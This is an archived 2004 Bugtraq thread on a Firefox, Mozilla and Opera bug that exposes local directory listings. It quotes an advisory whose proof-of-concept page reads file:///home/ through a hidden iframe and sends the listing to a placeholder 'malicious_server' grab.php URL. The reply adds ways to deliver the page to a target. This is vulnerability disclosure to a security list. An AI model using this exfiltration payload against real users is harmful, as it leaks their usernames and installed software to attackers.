lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <41AE7492.5020108@umbrella.name>
Date: Thu, 02 Dec 2004 09:49:06 +0800
From: Liu Die Yu <liudieyu@...rella.name>
To: badpenguin@...e-h.org
Cc: bugtraq@...urityfocus.com
Subject: Re: Disclosure of file system information in Mozilla Firefox and
 Opera Browser:


Target user doesn't need to click the OPEN button:
1. Cross-site scripting vulnerabilities can get it done(on Mozilla, an 
internet page can't navigate to a local page directly ... but there are 
ways to bypass this restriction).
2. Ask target to open an HTML file in a remote SMBFS folder - expecting 
him to
mount -t smbfs [...] /mnt/[...]
and open "/mnt/[...].html" in Mozilla :-)

Attacker can *browse* target's folders and files(file content, filename, 
filesize, and even the date).

==========

http://editive.com/referrer

Giovanni Delvecchio wrote:

> Title: Disclosure of file system information in Mozilla Firefox and 
> Opera Browser
>
> Note:
> I don't know if it could be considered really a security problem, 
> anyway i'll try to explain my ideas.
> Sorry for my bad english.
>
>
>
> Author: Giovanni Delvecchio
>
> Bug: Disclosure of file system information
>
>
> Applications affected:
>
> - Firefox 1.0
> - Mozilla 1.7
> - Opera 7.54 (*)
>
> ( maybe also previous versions )
>
>
> Tested versions:
>
> - Firefox 1.0 on Linux and Windows
> - Mozilla 1.7 on Windows
> - Opera 7.51,..7.54 on Linux
>
>
>
> Note:
> The content of this advisory could be applied also to other browsers, 
> i have checked just Mozilla, Firefox,Opera and Microsoft Internet 
> Explorer.
> Microsoft Internet Explorer seems not to be affected.
>
>
>
> Bug Description:
> ================
> A problem exist in some browsers where a frame can gain access to 
> attributes of another frame or iframe.
> An application of this bug could be the possibility to disclose local 
> directory structure.
>
>
>
> PoC:
> ===
>
> ------ begin code.htm -----
>
> <html>
>
> <body onLoad="
>
>  list_files='';
>  for(i=0;i<local_files.document.links.length;i++)
>           {list_files+=local_files.document.links.item(i);}
>  alert(list_files);
>  //send list_files at malicious_server
>  
> document.location.href='http://malicious_server/grab.php?list='+list_files; 
>
>
>              ">
>
> <iframe name="local_files" src="file:///home/" height=0
> width=0></iframe>
>
>
> </body>
>
> </html>
>
> ------ end of code.htm -------
>
>
> Impact:
> ======
> A malicious server could obtain the content of /home/ directory ( or 
> c:\Document and Setting\ for windows system  ) and so know a set of 
> usernames present on system target.
> Moreover, colud be possible know if a particolar program is installed 
> on target system for a succesive attack.
>
> Anyway it cannot be exploited "directly" by a remote site, but only if 
> the page is opened from a local path ( file://localpath/code.htm),  
> since the iframe "local_files" belongs to a local domain.
>
> Note: with Internet Explorer code.htm doesn't work even in local.
>
>
>
> Possible Remote Exploitation:
> ========================
>
> Question:
> How could a malicious remote user exploit it ?
>
> Answer:
> After that the user "victim" has required 
> http://maliciuos_server/code.htm, if malicious_server responds with a 
> page containing an unknown Content-Type field ( for example text/html. 
> ,note the dot) ,the browser will show a dialog window with some 
> options (open, save, cancel). Choosing "Open" to view this page, it 
> will be downloaded and opened in local ; javascript code will be 
> executed in local context.
> Obviously, if user chooses to save and after open it the result is equal.
>
> (*) For Opera this  method of remote exploitation requires that opera 
> must be setted as Default Application in "handler for saved files" 
> whether the user choose "Open" in the dialog window.
>
>
>
> Solution:
> ========
> No solution at the moment
>
>
> Vendor notice
> ==============
> 24th November 2004: I have contacted mozilla by security@...illa.org
> and Opera by its bug track page at https://bugs.opera.com/wizard/
>
> No response from both at the moment.
>
>
>
>
> Best regards,
>
> Giovanni Delvecchio
>
> _________________________________________________________________
> Personalizza MSN Messenger con sfondi e fotografie! 
> http://www.ilovemessenger.msn.it/
>
> .
>



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ